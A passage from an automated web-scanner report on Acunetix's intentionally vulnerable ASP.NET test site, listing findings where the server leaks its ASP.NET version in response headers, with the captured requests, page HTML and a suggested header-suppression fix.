on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        28. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZC
wgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        29. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ